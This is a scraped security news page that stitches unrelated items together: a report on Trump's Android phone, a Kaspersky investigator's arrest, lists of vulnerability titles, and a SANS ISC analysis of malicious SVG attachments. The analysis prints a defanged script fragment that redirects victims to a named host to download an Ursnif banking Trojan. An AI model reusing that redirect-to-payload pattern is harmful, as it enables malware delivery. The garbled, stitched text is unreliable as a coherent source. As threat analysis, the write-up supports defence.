(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Enlarge / The Samsung Galaxy S7 and S7 Edge, Samsung's most recent (non-exploding) flagship smartphones. (credit: Ron Amadeo)

Donald Trump continues to use his "old, unsecured Android phone" since taking office despite "the protests of some of his aides," according to a report from The New York Times about how the new president is settling in to his routine. This contradicts another report from late last week that indicated Trump had given up the phone in exchange for a "secure, encrypted device approved by the Secret Service."

It's not clear exactly what kind of Android phone Trump uses—he has previously indicated that it's a Samsung Galaxy device—or whether it has also been encrypted or otherwise hardened or what kinds of things he uses it for. Samsung's Knox software is approved for "sensitive but unclassified use" by the US Department of Defense, so these phones are cleared for at least some kinds of government work when configured correctly.

How big of a deal is this? We don't know anything about the phone's configuration, but the state of Android security is notoriously poor compared to other operating systems like iOS or Windows, both of which are patched regularly by Apple and Microsoft with no interference from hardware manufacturers or wireless carriers. Google releases monthly security updates for Android, and Samsung is better than most about actually releasing those updates to its most recent devices (flagship phones tend to get monthly updates, midrange phones and most tablets get quarterly patches), but there is still often a gap of several days or weeks between when those security bulletins are published and when the patches are available.

Read 2 remaining paragraphs | Comments

Cisco Adaptive Security Appliance CX Context-Aware Security Denial of Service Vulnerability

In a move that stunned some security researchers, a top investigator at Russia's largest antivirus provider, Kaspersky Lab, has been arrested in an investigation into treason, a crime that upon conviction can carry severe sentences.

Ruslan Stoyanov

Ruslan Stoyanov (credit: Kaspersky Lab)

Ruslan Stoyanov, the head of Kaspersky Lab's investigations unit, was arrested in December, Russian newspaper Kommersant reported Wednesday. The paper said that Sergei Mikhailov, a division head of the Russian intelligence service FSB, was also arrested in the same probe. Stoyanov joined the Moscow-based AV company in 2012 and was chiefly involved in investigating and responding to hacking-related crimes carried out in Russia. His LinkedIn profile shows he served as a major in the cybercrime unit of Russia's Ministry of Interior from 2000 to 2006.

"The case against this employee does not involve Kaspersky Lab," company officials wrote in a statement issued following the report. "The employee, who is Head of the Computer Incidents Investigation Team, is under investigation for a period predating his employment at Kaspersky Lab. We do not possess details of the investigation. The work of Kaspersky Lab's Computer Incidents Investigation Team is unaffected by these developments."

Read 5 remaining paragraphs | Comments

systemd CVE-2016-10156 Local Privilege Escalation Vulnerability
TigerVNC CVE-2017-5581 Buffer Overflow Vulnerability
Cisco Expressway Series and Cisco TelePresence VCS CVE-2017-3790 Denial of Service Vulnerability
Virglrenderer CVE-2017-5580 Denial of Service Vulnerability
QEMU CVE-2017-5579 Denial of Service Vulnerability
Cisco TelePresence Multipoint Control Unit CVE-2017-3792 Remote Code Execution Vulnerability
QEMU CVE-2016-10163 Denial of Service Vulnerability
PHP CVE-2016-10160 Remote Code Execution Vulnerability
IBM PowerKVM CVE-2016-7076 Local Command Execution Vulnerability
QEMU 'virtio-gpu.c' Denial of Service Vulnerability
Support-Project Knowledge CVE-2017-2097 Unspecified Cross-Site Request Forgery Vulnerability
smalruby-editor CVE-2017-2096 OS Command Injection Vulnerability
QEMU 'virtio-gpu-3d.c' Denial of Service Vulnerability
IBM Forms Experience Builder CVE-2016-6001 Server Side Request Forgery Security Bypass Vulnerability
Nessus CVE-2016-9260 HTML Injection Vulnerability
PHP CVE-2016-10159 Integer Overflow Vulnerability
QEMU CVE-2016-10155 Denial of Service Vulnerability
Mozilla Firefox Multiple Security Vulnerabilities
Linux Kernel CVE-2017-5576 Integer Overflow Vulnerability
PHP CVE-2016-10161 Denial of Service Vulnerability
Schneider Electric Wonderware CVE-2017-5155 Historian Insecure Default Password Vulnerability
Linux Kernel CVE-2017-5577 Remote Buffer Overflow Vulnerability
OpenCart CSRF - User Account Takeover
PHP 'wddx.c' NULL Pointer Dereference Denial of Service Vulnerability
Mozilla Firefox CVE-2017-5373 Multiple Unspecified Memory Corruption Vulnerabilities
Mozilla Firefox CVE-2017-5377 Memory Corruption Vulnerability
Apple iTunes/iCloud/Safari/iOS CVE-2017-2366 Multiple Memory Corruption Vulnerabilities
Webkit CVE-2017-2371 Security Bypass Vulnerability
phpMyAdmin Incomplete Fix PMASA-2017-5 Security Bypass Vulnerability
phpMyAdmin PMASA-2017-6 Server Side Request Forgery Security Bypass Vulnerability
Mozilla Firefox CVE-2017-5374 Multiple Memory Corruption Vulnerabilities

In November 2016, the Facebook messenger application was used to deliver malicious SVG files to people [1]. SVG files (or Scalable Vector Graphics) are vector images that can be displayed in most modern browsers (natively or via a specific plugin). More precisely, Internet Explorer 9 supports the basic SVG feature sets and IE10 extended the support by adding SVG 1.1 support. In the Microsoft Windows operating system,SVG files are handled by Internet Explorer by default.

From a file format point of view, SVG files are XML-based and can be edited/viewed via your regular text editor. Amongst all the specifications of the SVG format, we can read this one in the W3C recommendations [2]:

All aspects of an SVG document can be accessed and manipulated using scripts in a similar way to HTML. The default scripting language is ECMAScript (closely related to JavaScript) and there are defined Document Object Model (DOM) objects for every SVG element and attribute. Scripts are enclosed in

As you can see, attackers have all the requirements to build malicious SVG files. A few days ago, I captured two samples via my honeypot:

  • 00967999543-(02).svg (MD5:6b9649531f35c7de78735aa45d25d1a7)
  • P0039988439992_001.jpg.svg (MD5:e2f7245d016c52fc9c56531e483e6cfb)

Those two pictures belong"> _?xml version=1.0 standalone=no?__!DOCTYPE svg PUBLIC -//W3C//DTD SVG 1.1//EN http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd__svg xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink version=1.1_ _image width=1000 height=900 xlink:href=base64, ... ... ... /_ _script type=application/javascript_ ... ... ...]] _/script__/svg_

(_ have been used to prevent the code to be interpreted by readers"> setTimeout(function () { window.location.href = hxxp://juanpedroperez.com/fotos/photos/xfs_extension.exe

The PE fileis not available anymore at the location above but here is a link[3] to the sample (it was an Ursnif banking Trojan[4]). The malicious SVG file is of course delivered via a ZIP archive. At the moment, those two malicious files are detected by most of the antivirus but other waves may be launched. Keep an eye on this file format and another file extension to take care of.


ISC Handler - Freelance Security Consultant

or Graphics (SVG) is an XML-based vector image format for two-dimensional graphics with support for interactivity and animation. The SVG specification is an open standard developed by the World Wide Web Consortium (W3C) since 1999.

SVG images and their behaviors are defined in XML text files. This means that they can be searched, indexed, scripted, and compressed. As XML files, SVG images can be created and edited with any text editor, but are more often created with drawing software.



Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Mozilla Firefox CVE-2017-5376 Denial of Service Vulnerability
Mozilla Firefox CVE-2017-5375 ASLR and DEP Security Bypass Vulnerability
Quagga CVE-2017-5495 Denial of Service Vulnerability
ImageMagick CVE-2016-10146 Local Information Disclosure Vulnerability
[security bulletin] HPSBST03642 rev.3 - HPE StoreVirtual Products running LeftHand OS using OpenSSL and OpenSSH, Remote Arbitrary Code Execution, Denial of Service (DoS), Disclosure of Sensitive Information, Unauthorized Access
[security bulletin] HPSBHF03695 rev.1 - HPE Ethernet Adaptors, Remote Denial of Service (DoS)
[security bulletin] HPSBHF03441 rev.2 - HPE iLO 3, iLO 4 and iLO 4 mRCA, Remote Multiple Vulnerabilities
Internet Storm Center Infocon Status